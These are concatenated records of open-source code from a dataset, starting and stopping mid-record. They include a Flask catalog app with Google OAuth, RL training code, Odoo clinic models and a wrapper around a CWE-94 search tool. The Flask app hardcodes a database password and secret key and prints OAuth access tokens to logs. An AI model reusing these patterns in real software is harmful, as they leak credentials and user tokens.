+ runner.opts.classpath\n kwargs = dict(classpath=cpath)\n runner.java_execute(VoltCompiler, None, *args, **kwargs)\n","sub_path":"Java+/Database+/VoltDb+/VoltDbEmbedded/libs/python/voltcli/voltdb.d/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"392848775","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask import flash, make_response, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_configuration import Base, Category, Item, User\nfrom flask import session as login_session\nimport random\nimport string\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nimport requests\n\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\napp = Flask(__name__)\nengine = create_engine('postgresql://sysdba:secret@localhost/catalog')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n# Check if it's A User or just an anonymous user.\ndef CheckUserLogin():\n return 'username' in login_session\n\n\n# Check if the User who attemps to edit/delete the item, is Authorized.\ndef CheckItemOwner(item):\n if(CheckUserLogin()):\n currentLoggedUser_id = getUserID(login_session['email'])\n itemOwner = item.user.id\n return currentLoggedUser_id == itemOwner\n else:\n return False\n\n\n# User Helper Functions:\ndef createUser(login_session):\n newUser = User(name=login_session['username'], email=login_session[\n 'email'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n return user.id\n\n\ndef getUserInfo(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef getUserID(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except Exception as e:\n return None\n\n\n@app.route('/', methods=['GET'])\ndef index():\n categories = session.query(Category).all()\n items = session.query(Item).order_by(Item.id.desc()).limit(9)\n LOGIN = CheckUserLogin()\n return render_template(\n 'index.html', categories=categories, items=items, login=LOGIN)\n\n\n@app.route('/catalog//items', methods=['GET'])\ndef categoryItems(category_id):\n categories = session.query(Category).all()\n items = session.query(Item).filter_by(category_id=category_id).all()\n LOGIN = CheckUserLogin()\n return render_template(\n 'items.html', categories=categories, items=items, login=LOGIN)\n\n\n@app.route('/catalog//', methods=['GET'])\ndef itemInfo(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n owner = CheckItemOwner(item)\n return render_template('item.html', item=item, owner=owner)\n\n\n@app.route('/catalog/new', methods=['GET', 'POST'])\ndef newItem():\n if not CheckUserLogin():\n return redirect(url_for(\"showLogin\"))\n\n categories = session.query(Category).all()\n if request.method == 'POST':\n category_id = request.form.get('category_id')\n user_id = getUserID(login_session['email'])\n item = Item(name=request.form.get(\n 'name'), description=request.form.get(\n 'description'), category_id=category_id, used_id=user_id)\n session.add(item)\n session.commit()\n return redirect(url_for(\"categoryItems\", category_id=category_id))\n else:\n return render_template('new.html', categories=categories)\n\n\n@app.route('/catalog///edit', methods=[\n 'GET', 'POST'])\ndef editItem(category_id, item_id):\n categories = session.query(Category).all()\n item = session.query(Item).filter_by(id=item_id).one()\n owner = CheckItemOwner(item)\n if not owner:\n code = 403\n message = \"You are not Authorized to do this.\"\n return render_template(\"error.html\", code=code, message=message)\n\n if request.method == 'POST':\n item.name = request.form.get('name')\n item.description = request.form.get('description')\n item.category_id = request.form.get('category_id')\n return redirect(url_for(\n \"categoryItems\", category_id=request.form.get('category_id')))\n else:\n return render_template(\"edit.html\", item=item, categories=categories)\n\n\n@app.route(\n '/catalog///delete', methods=[\n 'GET', 'POST'])\ndef deleteItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n owner = CheckItemOwner(item)\n if not owner:\n code = 403\n message = \"You are not Authorized to do this.\"\n return render_template(\"error.html\", code=code, message=message)\n\n if request.method == 'POST':\n session.delete(item)\n session.commit()\n return redirect(url_for(\"categoryItems\", category_id=category_id))\n else:\n return render_template(\"delete.html\", item=item)\n\n\n@app.route('/api')\ndef developers():\n return render_template(\"developers.html\")\n\n# End Points\n\n\n@app.route('/catalog/json')\ndef categoriesJSON():\n categories = session.query(Category).all()\n return jsonify(Categories=[i.serialize for i in categories])\n\n\n@app.route('/catalog//json')\ndef categoryJSON(category_id):\n categoryItems = session.query(Item).filter_by(\n category_id=category_id).all()\n return jsonify(Items=[i.serialize for i in categoryItems])\n\n\n# Create anti-forgery state token\n@app.route('/login')\ndef showLogin():\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n login_session['state'] = state\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n print(\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # see if user exists, if it doesn't make a new one\n user_id = getUserID(login_session[\"email\"])\n if not user_id:\n user_id = createUser(login_session)\n login_session[\"user_id\"] = user_id\n return redirect(url_for(\"index\"))\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n access_token = login_session.get('access_token')\n if access_token is None:\n print('Access Token is None')\n response = make_response(\n json.dumps('Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n print('In gdisconnect access token is %s', access_token)\n print('User name is: ')\n print(login_session['username'])\n a_token = login_session['access_token']\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % a_token\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n print('result is ')\n print(result)\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n response = make_response(json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return redirect(url_for(\"index\"))\n else:\n response = make_response(\n json.dumps('Failed to revoke token for given user.', 400))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\nif __name__ == '__main__':\n app.debug = False\n app.secret_key = \"FSND\"\n app.run(host='0.0.0.0', port=80)\n","sub_path":"catalog/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"316911554","text":"#!/usr/bin/env python\n# this line is just used to define the type of document\n\nimport numpy as np\nfrom yaw_rate_controllers import yaw_controller as yc\n\n\nclass SimpleTrackingYawController(yc.YawController):\n\n @classmethod\n def description(cls):\n return \"Simple yaw tracking controller, based on feedback linearization of yaw rate equation\"\n\n def __init__(self, gain = 1.0):\n self.__gain = gain\n \n \n def __str__(self):\n string = yc.YawController.__str__(self)\n string += \"\\nGain: \" + str(self.__gain)\n return string\n\n\n def output(self, state, state_desired):\n # state = euler_angles in RAD + euler_angles_time_derivative in RAD/SEC\n # state_desired = psi_desired in RAD + psi_desired_time_derivative in RAD/SEC\n #return self.controller(state,state_desired)\n\n #--------------------------------------#\n # current phi and theta and psi\n euler_angles = state[0:3]\n phi = euler_angles[0]\n theta = euler_angles[1]\n psi = euler_angles[2]\n\n euler_angles_time_derivative = state[3:6]\n \n phi_dot = euler_angles_time_derivative[0]\n theta_dot = euler_angles_time_derivative[1]\n psi_dot = euler_angles_time_derivative[2]\n\n #--------------------------------------#\n psi_star = state_desired[0]\n psi_star_dot = state_desired[1]\n psi_dot = psi_star_dot - self.__gain*np.sin(psi - psi_star)\n yaw_rate = 1.0/np.cos(phi)*(np.cos(theta)*psi_dot - np.sin(phi)*theta_dot)\n \n return yaw_rate\n\n\n# \"\"\"Test\"\"\"\n# \n#string = TrackingYawController.parameters_to_string()\n#print string\n#parameters = TrackingYawController.string_to_parameters(string)\n#print parameters\n#controller = TrackingYawController(parameters)\n#print controller\n#output = controller.output(np.zeros(6), np.ones(2))\n#print output\n\n\n\n\n\n","sub_path":"quad_control/src/yaw_rate_controllers/simple_tracking_yaw_controller/simple_tracking_yaw_controller.py","file_name":"simple_tracking_yaw_controller.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"478959648","text":"__author__ = ' Барсанов Сергей Сергеевич '\n\n\n# Все задачи текущего блока решите с помощью генераторов списков!\n\n# Задание-1:\n# Дан список, заполненный произвольными целыми числами. \n# Получить новый список, элементы которого будут\n# квадратами элементов исходного списка\n# [1, 2, 4, 0] --> [1, 4, 16, 0]\n\nlist1 = [int(i) for i in (1, 2, 4, 6, 23, -2)]\nlist2 = [i**2 for i in list1]\nprint(list2)\n\n\n# Задание-2:\n# Даны два списка фруктов.\n# Получить список фруктов, присутствующих в обоих исходных списках.\nfruits1 = ['апельcин', 'алыча', 'яблоко', 'персик', 'карамбола', 'банан', 'чупа-чупа']\nfruits2 = ['апельcин', 'банан', 'карамбола', 'грумичама', 'алыча', 'чупа-чупа', 'персик', 'киви', 'манго', 'лимон']\nfruits_list = [elem for elem in fruits1 if elem in fruits2]\nprint(fruits_list)\n# Задание-3:\n# Дан список, заполненный произвольными числами.\n# Получить список из элементов исходного, удовлетворяющих следующим условиям:\n# + Элемент кратен 3\n# + Элемент положительный\n# + Элемент не кратен 4\n\nnumb_list1 = [int(i) for i in (3, 2, 24, -94, -21, 23, 81, 954, 0, 3265)]\nnumb_list2 = [int(i) for i in numb_list1 if i > 0 and i % 3 == 0 and i % 4 != 0]\nprint('Список, удовлетворяющий указанным условиям: ', numb_list2)","sub_path":"hw_les04_easy.py","file_name":"hw_les04_easy.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"333451296","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\n\nfrom odoo import api, fields, models, _\nfrom odoo.tools import ustr\nfrom odoo.exceptions import UserError\n\nSEXE = [\n ('m', 'M'),\n ('f', 'F'),\n]\n\nTYPE_DENT = [\n ('11','11'),\n ('12','12'),\n ('13','13'),\n ('14','14'),\n ('15','15'),\n ('16','16'),\n ('17','17'),\n ('18','18'),\n ('21','21'),\n ('22','22'),\n ('23','23'),\n ('24','24'),\n ('25','25'),\n ('26','26'),\n ('27','27'),\n ('28','28'),\n ('31','31'),\n ('32','32'),\n ('33','33'),\n ('34','34'),\n ('35','35'),\n ('36','36'),\n ('37','37'),\n ('38','38'),\n ('41','41'),\n ('42','42'),\n ('43','43'),\n ('44','44'),\n ('45','45'),\n ('46','46'),\n ('47','47'),\n ('48','48'),\n \n ('51','51'),\n ('52','52'),\n ('53','53'),\n ('54','54'),\n ('55','55'),\n ('61','61'),\n ('62','62'),\n ('63','63'),\n ('64','64'),\n ('65','65'),\n ('71','71'),\n ('72','72'),\n ('73','73'),\n ('74','74'),\n ('75','75'),\n ('81','81'),\n ('82','82'),\n ('83','83'),\n ('84','84'),\n ('85','85'),\n]\n\n# ---------------------------------------------------------\n# Patient Info\n# ---------------------------------------------------------\nclass PatientInfo(models.Model):\n _name = \"gestion.clinique.patient.info\"\n _description = \"La fiche patient\"\n _order = \"sequence\"\n\n sequence = fields.Char(string='Code Patient', readonly=True)\n name = fields.Char(string='Nom', required=True)\n firstname = fields.Char(string='Prénom', required='True')\n age = fields.Integer(string=\"Age\")\n sexe = fields.Selection(SEXE, String='Sexe')\n adresse = fields.Char(String='Adresse')\n numero_telephone = fields.Char(string=\"Numéro de téléphone\")\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n vals['sequence'] = self.env['ir.sequence'].get('gestion.clinique.patient.info')\n res = super(PatientInfo, self).create(vals) \n return res\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n if record.name:\n name = record.name \n if record.name and record.firstname:\n name = record.firstname +' '+record.name\n if record.sequence and record.name:\n name = record.sequence +' '+record.name\n if record.sequence and record.name and record.firstname:\n name = record.sequence +' '+record.name+' '+record.firstname\n result.append((record.id, name))\n return result\n \n# ---------------------------------------------------------\n# Patient\n# ---------------------------------------------------------\nclass PATIENT(models.Model):\n _name = \"gestion.clinique.patient\"\n _description = \"La fiche patient\"\n\n date_consultation = fields.Date(string=\"Date Consultation\")\n motif_consultation = fields.Char(string='Motif de la consultation')\n antecedents = fields.Text(string='Antécédents')\n femme_enceinte = fields.Boolean(string=\"Femme enceinte\")\n observation = fields.Text(string='Obervation')\n\n patient_info_id = fields.Many2one('gestion.clinique.patient.info', string='Patient', required=True)\n\n patient_rdv_ids = fields.One2many('gestion.clinique.patient.rdv', 'patient_id', string='Patient RDV')\n radiographie_ids = fields.One2many('gestion.clinique.radiographie', 'patient_id', string='Radiographie')\n diagnostic_ids = fields.One2many('gestion.clinique.diagnostic', 'patient_id', string='Diagnostic')\n traitement_ids = fields.One2many('gestion.clinique.traitement', 'patient_id', string='Traitement')\n\n\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n vals['date_consultation'] = str(date.today())\n res = super(PATIENT, self).create(vals) \n return res\n\n @api.multi\n def write(self, vals):\n rep = super(PATIENT, self).write(vals)\n return rep\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n if record.patient_info_id.name:\n name = record.patient_info_id.name \n if record.patient_info_id.name and record.patient_info_id.firstname:\n name = record.patient_info_id.firstname +' '+record.patient_info_id.name\n if record.patient_info_id.sequence and record.patient_info_id.name:\n name = record.patient_info_id.sequence +' '+record.patient_info_id.name\n if record.patient_info_id.sequence and record.patient_info_id.name and record.patient_info_id.firstname:\n name = record.patient_info_id.sequence +' '+record.patient_info_id.name+' '+record.patient_info_id.firstname\n result.append((record.id, name))\n return result\n\nclass PatientRDV(models.Model):\n _name = \"gestion.clinique.patient.rdv\"\n _description = \"RDV Patient\"\n\n currency_id = fields.Many2one('res.currency', 'Currency', required=True,\\\n default=lambda self: self.env.user.company_id.currency_id.id)\n\n sequence_rdv = fields.Char('Sequence', compute='compute_numero_rdv', store=True)\n date_rdv = fields.Date(string='Date', required=True)\n avance = fields.Monetary()\n reste = fields.Monetary()\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Patient', required=True)\n mes_rendez_vous_id = fields.Many2one('mes.rendez.vous', string='Mes rendez vous')\n \n @api.multi\n @api.depends('patient_id')\n def compute_numero_rdv(self):\n for patient in self.mapped('patient_id'):\n number = 0\n for line in patient.patient_rdv_ids:\n line.sequence_rdv = 'RDV ' + str(number)\n number += 1\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n res = super(PatientRDV, self).create(vals) \n return res\n\n @api.multi\n def write(self, vals):\n rep = super(PatientRDV, self).write(vals)\n return rep\n\nclass Radiographie(models.Model):\n _name = \"gestion.clinique.radiographie\"\n _description = \"Radiographie\"\n\n lien = fields.Char(string=\"Lien\", required=True)\n nom = fields.Char()\n commentaire = fields.Char()\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Radiographie')\n\nclass PatientDiagnostic(models.Model):\n _name = \"gestion.clinique.diagnostic\"\n _description = \"Diagnostic\"\n\n type = fields.Selection(TYPE_DENT,string=\"Type dent\", required=True)\n nom = fields.Char(string='Nom', required=True)\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Diagnostic')\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n name = record.type +' '+ record.nom \n result.append((record.id, name))\n return result\n\nclass PatientTraitement(models.Model):\n _name = \"gestion.clinique.traitement\"\n _description = \"Traitement\"\n\n type = fields.Selection(TYPE_DENT,string=\"Type dent\", required=True)\n nom = fields.Char(string='Nom', required=True)\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Traitement')\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n name = record.type +' '+record.nom \n result.append((record.id, name))\n return result\n\n\n","sub_path":"gestion_clinique/models/gestion_clinique_patient.py","file_name":"gestion_clinique_patient.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"348818585","text":"##scores = [0, 31, 27, 31, 49, 21, 17, 25]\n##\n##wins = 0\n##losses = 0\n##for i in range(0, len(scores), 2):\n## if (scores[i] > scores[i+1]):\n## wins += 1\n## elif (scores[i] < scores[i+1]):\n## losses += 1\n## else:\n## pass\n##\n##print(\"MSU has\", wins, \"win(s) and\", losses, \"loss(es)\")\n\nf = open('town-and-country.in', 'r')\n\ndef grocery_bill(file_name):\n for items in f:\n items = line.split()\n print(\"The total bill = $ \" + sum(items))\n","sub_path":"PRACTICUMS/practicum-1-practice-2.py","file_name":"practicum-1-practice-2.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284824022","text":"import os\nimport sys\nimport subprocess\n\ndownload_script = \"src_internalDB.py\"\ndb_file = \"cwe94.json\"\n\nanalysis_script = os.path.join(\"syntax-search\", \"syntaxSearchTool_V2.js\")\nanalysis_target = os.path.join(os.getcwd(), \"new_package_src\")\n\nif __name__ == \"__main__\":\n download_command = \"python \" + download_script + \" \" + db_file\n download_output = subprocess.Popen(download_command, stderr=subprocess.STDOUT, shell=True)\n while download_output.poll() is None:\n if not download_output.stdout: continue\n line = download_output.stdout.readline()\n if not line: continue\n print(line)\n\n analysis_command = \"node \" + analysis_script + \" \\\"\" + analysis_target + \"\\\"\"\n analysis_output = subprocess.Popen(analysis_command, stderr=subprocess.STDOUT, shell=True)\n while analysis_output.poll() is None:\n if not analysis_output.stdout: continue\n line = analysis_output.stdout.readline()\n if not line: break\n print(line)\n","sub_path":"Tools/search/full_platform.py","file_name":"full_platform.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"449394909","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 10:51:54 2018\n\n@author: matthewszhang\n\"\"\"\nimport time\nimport os\nimport os.path as osp\nimport numpy as np\nfrom collections import deque\nfrom baselines.feudal.models import FeudalModel, RecurrentFeudalModel, I2AModel\nfrom baselines.feudal.runners import FeudalRunner, I2ARunner, TestRunner\nfrom baselines.program.decode import decode_index, decode\nfrom baselines.program.mlogger import Logger\nfrom baselines.feudal.utils import sf01, fl01\n\nPATH=\"tmp/build/graph\"\n \ndef num(l):\n N_NUMS = len(l)\n val = 0\n for i in range(N_NUMS):\n val += l[i] * (N_NUMS ** (N_NUMS - 1 - i))\n return val\n\ndef sort_by_state(scalars, encoded_states, env):\n scalar_dict = {}\n for i in range(len(encoded_states)):\n for j in range(encoded_states[i].shape[0]):\n state = num(decode(encoded_states[i][j])['state'])\n if state in scalar_dict:\n scalar_dict[state][1] = (scalar_dict[state][0] * scalar_dict[state][1] + scalars[i][j][1]) \\\n /(scalar_dict[state][0] + 1)\n scalar_dict[state][0] += 1\n else:\n scalar_dict[state] = [1,scalars[i][j][1]]\n return scalar_dict\n\ndef sort_by_time(scalars, neplength):\n scalar_dict = {}\n for i in range(len(scalars)):\n for j in range(neplength):\n if j in scalar_dict:\n try:\n scalar_dict[j][1] = (scalar_dict[j][0] * scalar_dict[j][1] + scalars[i][j][1]) \\\n /(scalar_dict[j][0] + 1)\n scalar_dict[j][0] += 1\n except:\n continue\n else:\n try:\n scalar_dict[j] = [1, scalars[i][j][1]]\n except:\n continue\n return scalar_dict\n\ndef invalids_by_goal(goals):\n invalids = []\n for i in range(goals.shape[0]):\n if np.all(goals[i] == 0.0):\n invalids.append(i)\n return invalids\n\ndef decode_trajectories(states):\n trajectory = []\n for i in range(states.shape[0]):\n trajectory.append(decode(states[i]))\n return trajectory\n \ndef pad(arr, minsize): # arr must be at least minsize\n nbatch = arr.shape[0]\n d = minsize - nbatch\n if d > 0:\n rep = [1]*(nbatch-1)+[d+1]\n arr = np.repeat(arr, rep, axis=0)\n return arr\n\ndef sbi(arr, dones):\n nbatch=dones.shape[0]\n abd=[]\n si=0\n for t in range(nbatch):\n if dones[t] == 1:\n abd.append(arr[si:t+1])\n si=t+1\n elif t==nbatch-1:\n abd.append(arr[si:])\n return abd\n\ndef pack(arr):\n try:\n arr = np.vstack(arr)\n if arr.shape[0]==1:\n return np.flatten(arr)\n else: return arr\n except:\n return np.hstack(arr)\n\ndef constfn(val):\n def f(_):\n return val\n return f\n\ndef mcret(actions, rews, dones, vals, lam=0.95, gam=0.99):\n mb_returns = np.zeros_like(rews)\n mb_advs = np.zeros_like(rews)\n lastgaelam = 0\n nsteps = rews.shape[0]\n nextvalues=vals[-1:,]\n print(nsteps)\n for t in reversed(range(nsteps)):\n if t == nsteps - 1:\n nextnonterminal = 0\n nextvalues = 0 # assume last is terminal -> won't be too significant unless tstep is large\n else:\n nextnonterminal = 1.0 - dones[t+1]\n nextvalues = vals[t+1]\n delta = rews[t] + gam * nextvalues * nextnonterminal - vals[t]\n mb_advs[t] = lastgaelam = delta + gam * lam * nextnonterminal * lastgaelam\n \n mb_returns = mb_advs + vals\n return mb_returns, mb_advs\n\ndef recurrent_mcret(actions, rews, dones, vals, lam=0.95, gam=0.99):\n mb_returns = np.zeros_like(rews)\n mb_advs = np.zeros_like(rews)\n lastgaelam = 0\n nsteps = rews.shape[1]\n nextvalues=vals[:,-1:,]\n for t in reversed(range(nsteps)):\n if t == nsteps - 1:\n nextnonterminal = 0\n nextvalues = 0 # assume last is terminal -> won't be too significant unless tstep is large\n else:\n nextnonterminal = 1.0\n nextvalues = vals[:,t+1,:]\n delta = rews[:,t,:] + gam * nextvalues * nextnonterminal - vals[:,t,:]\n mb_advs[:,t,:] = lastgaelam = delta + gam * lam * nextnonterminal * lastgaelam\n \n mb_returns = mb_advs + vals\n return mb_returns, mb_advs\n\ndef safe_vstack(arr, dim1):\n assert arr\n shape = arr[0].shape\n return np.reshape(np.vstack(arr), (dim1,) + shape)\n \ndef learn(*, policy, env, tsteps, nsteps, encoef, lr, cliphigh, clipinc, vcoef,\n mgn, gmax, ginc, lam, nhier, nmb, noe, ngmin, nginc, bmin, bmax, nhist,\n recurrent, cos, val, fixed_manager, fixed_agent, goal_state, ts,\n cm, nhidden=64, max_len=100,\n save_interval=0, log_interval=1, test_interval=1, test_env=None,\n logger=None, load_path=None):\n \n if isinstance(lr, float): lr = constfn(lr)\n else: assert callable(lr)\n if isinstance(cliphigh, float):\n arr = np.asarray([cliphigh*(clipinc**i) for i in range(nhier)], dtype=np.float32) \n cliprange = constfn(arr)\n else: \n def cr(t):\n arr = [cliphigh(t)*(clipinc(t)**i) for i in range(nhier)]\n return np.asarray(arr, dtype=np.float32)\n cliprange = cr \n if isinstance(encoef, float):\n lr = constfn(encoef)\n else:\n assert callable(encoef)\n\n neplength = max_len\n ob_space = env.observation_space\n ac_space = env.action_space\n assert nsteps%max_len == 0\n if recurrent:\n nbatch = nsteps//max_len\n else:\n nbatch = nsteps\n nupdates = tsteps//nsteps\n nbatch_train = nbatch // nmb\n \n def ng(k):\n return ngmin * (nginc **(nhier - k))\n def gamma(k):\n return 1 - (gmax * (ginc ** (nhier - 1 - k)))\n def nh(k):\n return nhist ** (k)\n def beta(k):\n if nhier==1:\n return bmin \n else:\n return bmin + (bmax - bmin) * k / (nhier - 1)\n \n if recurrent:\n make_model = lambda : RecurrentFeudalModel(policy, env, ob_space, ac_space,\n neplength=neplength, max_grad=mgn,\n ngoal=ng, recurrent=recurrent, g=gamma, nhist=nh, b=beta, nhier=nhier,\n val=val, cos=cos, fixed_agent=fixed_agent, fixed_network=fixed_manager, goal_state=goal_state,\n encoef=encoef, vcoef=vcoef, nh=nhidden, train_supervised=ts)\n else:\n make_model = lambda : FeudalModel(policy, env, ob_space, ac_space, max_grad=mgn,\n ngoal=ng, recurrent=recurrent, g=gamma, nhist=nh, b=beta, nhier=nhier,\n val=val, cos=cos, fixed_agent=fixed_agent, fixed_network=fixed_manager, goal_state=goal_state,\n encoef=encoef, vcoef=vcoef, nh=nhidden, train_supervised=ts)\n model = make_model()\n if load_path is not None:\n model.load(load_path)\n \n runner = FeudalRunner(env=env, model=model, nsteps=max_len, \n recurrent=recurrent, fixed_manager=fixed_manager,\n fixed_agent=fixed_agent)\n test_runner = FeudalRunner(env=test_env, model=model, nsteps=max_len,\n recurrent=recurrent, fixed_manager=fixed_manager,\n fixed_agent=fixed_agent)\n epinfobuf = deque(maxlen=100)\n tfirststart = time.time()\n \n state_rew_logger = Logger(dir=logger.dir, output_format=['CSV'], csv_tag='sinrs.csv')\n time_rew_logger = Logger(dir=logger.dir, output_format=['CSV'], csv_tag='tinrs.csv')\n test_run_logger = Logger(dir=logger.dir, output_format=['TXT'], txt_tag='test_traj.txt')\n \n if not val:\n vre = np.zeros((nhier), dtype=np.float32)\n val_temp = 0.9\n \n for update in range(1, nupdates+1):\n tstart = time.time()\n frac = 1.0 - (update - 1.0) / nupdates\n lrnow = lr(frac)\n cliprangenow = cliprange(frac)\n encoefnow = encoef(frac)\n print(encoefnow, frac)\n obs, rewards, actions, dones, mbpi, init_goals, goals, s_actions, states, epinfos = runner.run()\n trun = time.time()\n print(trun - tstart)\n epinfobuf.extend(epinfos)\n mblossvals = []\n \n if not recurrent:\n rewards, vfs, nlps, inrs, fvecs, sparse_inrs = \\\n model.av(obs, actions, rewards, dones, goals, states, init_goals)\n #print(inrs)\n #print(\"num of frames: {}\".format(len(inrs)))\n #print(\"num of frames: {}\".format(len(sparse_inrs)))\n #print(sparse_inrs)\n #print([np.concatenate((i,j), 1) for i,j in zip(inrs, sparse_inrs)])\n #print(inrs)\n tstats = time.time()\n print(tstats - trun)\n #perform tally for each unique goal\n if fixed_manager and nhier > 1:\n inrs_per_goal = sort_by_state(inrs, init_goals, env)\n \n for index,i in enumerate(inrs_per_goal.items()):\n state_rew_logger.logkv(\"{}\".format(i[0]), i[1][1])\n state_rew_logger.dumpkvs()\n \n inrs_per_timestep = sort_by_time(inrs, neplength)\n for index,i in enumerate(inrs_per_timestep.items()):\n time_rew_logger.logkv(\"{}\".format(index), i[1][1])\n time_rew_logger.dumpkvs()\n rewards, vfs, nlps, inrs, fvecs, sparse_inrs = \\\n map(np.asarray,(rewards, vfs, nlps, inrs, fvecs, sparse_inrs))\n states = states[:,np.newaxis,:]\n states = np.tile(states, (1, neplength, *np.ones_like(states.shape[2:])))\n obs, actions, dones, mbpi, init_goals, goals, states, rewards, \\\n vfs, nlps, inrs, fvecs, s_actions, sparse_inrs = \\\n (fl01(arr) for arr in (obs, actions, dones,\n mbpi, init_goals, goals, states, rewards,\n vfs, nlps, inrs[:,1:,:], fvecs, s_actions, sparse_inrs))\n \n number_of_correct = np.sum(np.where(inrs[:,-1] > 0.99, True, False))\n if not val:\n vre = vre * val_temp + np.mean(rewards, axis=0) * (1-val_temp)\n vfs = np.reshape(np.repeat(vre, nsteps), [nsteps, nhier])\n rewards, advs = mcret(actions, rewards, dones, vfs, lam=lam, gam=model.gam)\n actions = actions.flatten() #safety\n inds = np.arange(nbatch)\n #invalid_inds = np.array(invalids_by_goal(goals))\n #print(invalid_inds.shape[0])\n #valid_inds = np.setdiff1d(np.arange(init_goals.shape[0]), invalid_inds)\n invalid_inds = []\n valid_inds = inds\n mean_inr = np.mean(inrs[valid_inds], axis=0)\n print(mean_inr.shape)\n mean_sparse_inr = np.mean(sparse_inrs[valid_inds], axis=0)\n if nhier == 1:\n goals = np.zeros((nbatch, 0, model.maxdim))\n \n sample = np.random.randint(0, nbatch)\n #print(decode(obs[sample]), s_actions[sample])\n #print(rewards[:40,1])\n for _ in range(noe):\n np.random.shuffle(inds)\n for start in range(0, nbatch, nbatch_train):\n end = start + nbatch_train\n mbinds = inds[start:end]\n mbinds_deleted = [i for i in mbinds if i not in invalid_inds]\n slices = (arr[mbinds_deleted] for arr in (\n obs, actions, rewards, advs, goals, nlps,\n fvecs, vfs, states, s_actions, init_goals)) \n #slices = (arr[mbinds] for arr in (obs, 